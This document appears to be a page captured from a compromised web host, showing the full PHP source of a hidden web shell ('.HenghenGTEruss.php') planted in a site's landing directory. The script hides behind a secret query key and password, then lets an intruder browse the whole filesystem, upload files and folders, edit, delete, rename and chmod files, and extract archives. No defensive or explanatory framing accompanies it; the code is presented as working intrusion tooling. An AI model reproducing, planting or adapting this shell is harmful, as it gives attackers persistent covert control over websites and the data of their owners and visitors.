HEX
Server: Apache
System: Linux info 3.0 #1337 SMP Tue Jan 01 00:00:00 CEST 2000 all GNU/Linux
User: u114749250 (6071667)
PHP: 8.2.31
Disabled: NONE
$ pwd: /homepages/30/d988631917/htdocs/clickandbuilds/LANDING/
Upload Files
File: /homepages/30/d988631917/htdocs/clickandbuilds/LANDING/.HenghenGTEruss.php
<?php declare(strict_types=1);session_start();define('ADMIN_HASH','$2y$10$gv2esSS3ek1kX4I7NAWuFukG1AD/xAi1sPDMb4qcEeLZL/ZMzFx8S');$HOME=realpath(__DIR__);if(!isset($_GET['hengheng898'])&&empty($_SESSION['auth'])){http_response_code(403);die('Access Denied!');}if(isset($_GET['logout'])){session_destroy();header('Location: ?hengheng898');exit;}if(isset($_GET['hengheng898'])&&empty($_SESSION['auth'])){if($_SERVER['REQUEST_METHOD']==='POST'){if(password_verify($_POST['password']?? '',ADMIN_HASH)){$_SESSION['auth']=true;$_SESSION['home']=$HOME;$_SESSION['cwd']=$HOME;header('Location: ?hengheng898');exit;}$err='Wrong password';} ?><!doctypehtml><html><body style="background:#111;color:#eee;font-family:monospace;padding:30px"><?=!empty($err)?"<p style='color:red'>$err</p>":""?><h3>☕PASTIKAN BERAMAL SEBELUM POSTING☕</h3><form method="post"><input name="password"type="password"required> <button>Login</button></form></body></html><?php exit;}function clean($n){return basename($n);}function perms($f){return substr(sprintf('%o',fileperms($f)),-4);}function rrmdir($d){if(!is_dir($d))return;foreach(scandir($d)as $i){if($i==='.'||$i==='..')continue;$p="$d/$i";is_dir($p)?rrmdir($p):unlink($p);}rmdir($d);}$cwd=realpath($_SESSION['cwd']?? $HOME)?:$HOME;$_SESSION['cwd']=$cwd;if(isset($_GET['home'])){$_SESSION['cwd']=$_SESSION['home'];header('Location: ?hengheng898');exit;}$output='';if(isset($_POST['cmd'])){$cmd=trim($_POST['cmd']);if($cmd==='pwd')$output=$cwd;elseif($cmd==='ls')$output=implode("\n",array_diff(scandir($cwd),['.','..']));elseif($cmd==='cd ..'){$_SESSION['cwd']=dirname($cwd);header('Location: ?hengheng898');exit;}elseif(substr($cmd,0,3)==='cd '){$t=$cwd.'/'.clean(substr($cmd,3));$r=realpath($t);if($r&&is_dir($r))$_SESSION['cwd']=$r;header('Location: ?hengheng898');exit;}}if($_SERVER['REQUEST_METHOD']==='POST'){if(isset($_POST['save_edit'],$_POST['content'])){$f=realpath($cwd.'/'.clean($_POST['save_edit']));if($f&&is_file($f)&&strpos($f,$cwd)===0){file_put_contents($f,$_POST['content']);}header('Location: ?hengheng898');exit;}if(!empty($_FILES['f']['name'][0])){foreach($_FILES['f']['name']as $i=>$n){move_uploaded_file($_FILES['f']['tmp_name'][$i],$cwd.'/'.basename($n));}header('Location: ?hengheng898');exit;}if(!empty($_FILES['dir']['name'][0])){foreach($_FILES['dir']['name']as $i=>$n){if(strpos($n,'..')!==false)continue;$dest=$cwd.'/'.$n;$d=dirname($dest);if(!is_dir($d))mkdir($d,0755,true);move_uploaded_file($_FILES['dir']['tmp_name'][$i],$dest);}header('Location: ?hengheng898');exit;}if(isset($_POST['new_folder'])){mkdir($cwd.'/'.clean($_POST['new_folder']),0755);header('Location: ?hengheng898');exit;}if(isset($_POST['new_file'])){file_put_contents($cwd.'/'.clean($_POST['new_file']),'');header('Location: ?hengheng898');exit;}if(isset($_POST['del_any'])){$f=realpath($cwd.'/'.clean($_POST['del_any']));if($f&&strpos($f,$cwd)===0){is_dir($f)?rrmdir($f):unlink($f);}header('Location: ?hengheng898');exit;}if(isset($_POST['old_name'],$_POST['new_name'])){$o=realpath($cwd.'/'.clean($_POST['old_name']));$n=$cwd.'/'.clean($_POST['new_name']);if($o&&strpos($o,$cwd)===0)rename($o,$n);header('Location: ?hengheng898');exit;}if(isset($_POST['chmod'],$_POST['perm'])){$f=realpath($cwd.'/'.clean($_POST['chmod']));if($f&&strpos($f,$cwd)===0)chmod($f,octdec($_POST['perm']));header('Location: ?hengheng898');exit;}if(isset($_POST['unzip'])){$zf=realpath($cwd.'/'.clean($_POST['unzip']));if($zf&&is_file($zf)){$z=new ZipArchive;if($z->open($zf)){for($i=0;$i<$z->numFiles;$i++){$n=$z->getNameIndex($i);if(strpos($n,'..')!==false)continue;$z->extractTo($cwd,[$n]);}$z->close();}}header('Location: ?hengheng898');exit;}}if(isset($_GET['edit'])){$f=realpath($cwd.'/'.clean($_GET['edit']));if(!$f)die('Not found'); ?><!doctypehtml><html><body style="background:#111;color:#eee;font-family:monospace"><h3>Edit:<?=htmlspecialchars(basename($f))?></h3><form method="post"><input name="save_edit"type="hidden"value="<?=htmlspecialchars(basename($f))?>"> <textarea name="content"style="width:100%;height:75vh"><?=htmlspecialchars(file_get_contents($f))?></textarea><br><button>Save</button> <a href="?hengheng898"><button type="button">Back</button></a></form></body></html><?php exit;}$parts=explode('/',trim($cwd,'/'));$path='';$crumb='<a href="?hengheng898&path=/">/</a>';foreach($parts as $p){$path.='/'.$p;$crumb.=' / <a href="?hengheng898&path='.urlencode($path).'">'.htmlspecialchars($p).'</a>';}if(isset($_GET['path'])){$p=realpath($_GET['path']);if($p&&is_dir($p)){$_SESSION['cwd']=$p;header('Location: ?hengheng898');exit;}}$items=scandir($cwd);$chmods=['0644','0755','0777','0700','0600']; ?><!doctypehtml><html><head><meta charset="utf-8"><title>Ma Vieta</title><style>body{background:#111;color:#eee;font-family:monospace}a{color:#6cf;text-decoration:none}table{width:100%;border-collapse:collapse}td,th{border:1px solid #333;padding:5px}button,input,select{background:#222;color:#eee;border:1px solid #444}.breadcrumb{margin:10px 0}</style></head><body><a href="?hengheng898&home"><button>HOME</button></a> <a href="?hengheng898&logout"><button>Logout</button></a><div class="breadcrumb"><?=$crumb?></div><b>pwd:</b><?=htmlspecialchars($cwd)?><form method="post"><input name="cmd"placeholder="pwd | ls | cd folder | cd .."style="width:70%"> <button>run</button></form><?php if($output): ?><pre><?=htmlspecialchars($output)?></pre><?php endif; ?><form method="post"><input name="new_folder"placeholder="folder"><button>mkdir</button></form><form method="post"><input name="new_file"placeholder="file.txt"><button>touch</button></form><form method="post"enctype="multipart/form-data"><input name="f[]"type="file"multiple> <button>UPLOAD FILE</button></form><form method="post"enctype="multipart/form-data"><input name="dir[]"type="file"multiple webkitdirectory> <button>UPLOAD FOLDER</button></form><table><tr><th>name</th><th>type</th><th>perm</th><th>action</th></tr><?php foreach($items as $i):if($i==='.'||$i==='..')continue;$p="$cwd/$i"; ?><tr><td><?=is_dir($p)?"<a href='#' onclick=\"go('$i')\">$i</a>":htmlspecialchars($i)?></td><td><?=is_dir($p)?'dir':'file'?></td><td><form method="post"><input name="chmod"type="hidden"value="<?=htmlspecialchars($i)?>"> <select name="perm"onchange="this.form.submit()"><?php foreach($chmods as $c): ?><option value="<?=$c?>"<?=$c===perms($p)?'selected':''?>><?=$c?></option><?php endforeach; ?></select></form></td><td><form method="post"style="display:inline"onsubmit='return confirm("hapus?")'><input name="del_any"type="hidden"value="<?=htmlspecialchars($i)?>"> <button>x</button></form><button onclick='rn("<?=htmlspecialchars($i,ENT_QUOTES)?>")'>rename</button><?php if(is_file($p)): ?><a href="?hengheng898&edit=<?=urlencode($i)?>"><button type="button">edit</button></a><?php endif; ?><?php if(is_file($p)&&substr($i,-4)==='.zip'): ?><form method="post"style="display:inline"><input name="unzip"type="hidden"value="<?=htmlspecialchars($i)?>"> <button>unzip</button></form><?php endif; ?></td></tr><?php endforeach; ?></table><form method="post"id="cd"><input name="cmd"type="hidden"id="c"></form><form method="post"style="display:none"id="renameForm"><input name="old_name"id="oldName"> <input name="new_name"id="newName"></form><script>function go(u){ c.value="cd "+u; cd.submit(); }
function rn(n){
    let x=prompt("Rename:",n);
    if(!x||x===n) return;
    oldName.value=n; newName.value=x;
    renameForm.submit();
}</script></body></html>
@ Telegram